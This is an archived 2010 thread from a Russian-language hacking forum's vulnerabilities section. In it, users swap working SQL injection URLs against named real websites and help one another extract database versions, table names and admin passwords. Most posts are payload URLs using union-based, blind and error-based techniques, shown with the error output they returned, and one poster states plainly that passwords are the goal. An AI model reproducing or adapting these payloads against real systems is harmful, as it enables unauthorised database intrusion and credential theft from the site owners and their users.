HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.10.2010, 20:37
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от IMMORTAL_S  
IMMORTAL_S said:
Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))
Вероятно, вот тут /thread119047-%C1%FB%F1%F2%F0%FB%E9.html
 
Ответить с цитированием

  #2  
Старый 20.10.2010, 20:38
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759

Репутация: -9
По умолчанию

Цитата:
Сообщение от Redwood  
Redwood said:
Какая версия, каким запросом у тебя получилось ее определить и что ты увидел на странице ?
http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5

без ошибок - следовательно 5 версия.

R1dex мне подсобил уже с этой скулей,

вот такой запрос работает

24 and 1=0 union select 1,2,3,4,5,6,7,9,null,10

Собственно вот:

http://www.mibf.ru/index.php?id=24 and 1 =0 union select 1,2,3,4,5,6,7,9,0x3a,10-- 1

сейчас проверил, оказалось его уже вскрыли раньше меня
 
Ответить с цитированием

  #3  
Старый 20.10.2010, 21:42
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

вот такая трабла:

http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limi t+0,1+--+

выводит версию в строку - 2004-00-27 даты

то есть вывод числовых значений без проблем

теперь пробуем вывести имя:

http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+

выводит 0000-00-00

думал попробовать покрутить через подзапросы, не не тут то было

http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28v ersion%28%29,1,1%29=4+--+

выводит профиль

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28select%20pwd%20from%20admin+limit+0,1%29,1 ,1%29%29%3E0+--+

ругается и обрезает все что идет до select

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+

Цитата:
Сообщение от None  
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select*/ pwd from admin limit 0,1),1,1))>0 -- '' at line 1
 
Ответить с цитированием

  #4  
Старый 20.10.2010, 22:51
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Помогите раскрутить слепую sql:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select pass FROM users LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select pass FROM users LIMIT 1), 14)e) b)a--+

Не выводит не одно из полей, не login, не password, ничего короче, помогите пожалуйста.
 
Ответить с цитированием

  #5  
Старый 20.10.2010, 23:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+

Duplicate entry '5.0.221' for key 1
 
Ответить с цитированием

  #6  
Старый 20.10.2010, 23:03
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+
Duplicate entry '5.0.221' for key 1
Я это знаю, как до значений таблицы дойти, пароли нужны)
 
Ответить с цитированием

  #7  
Старый 20.10.2010, 23:04
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

2MastaBass1:

Ну так.. Table 'ollis.users' doesn't exist

Ищи свою табличку в другой бд..
 
Ответить с цитированием

  #8  
Старый 20.10.2010, 23:06
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от R1dex  
R1dex said:
2MastaBass1:
Ну так.. Table 'ollis.users' doesn't exist
Ищи свою табличку в другой бд..
Это тоже знаю, так как ее найти, перебором?
 
Ответить с цитированием

  #9  
Старый 20.10.2010, 23:24
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

перебирай лимит ом
 
Ответить с цитированием

  #10  
Старый 20.10.2010, 23:36
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом
Просто лимит 1 потом 2 и т.д.? Не догнал...

Делаю так

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+

гонит Unknown column 'user' in 'field list'

побывал и логин и много чего
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ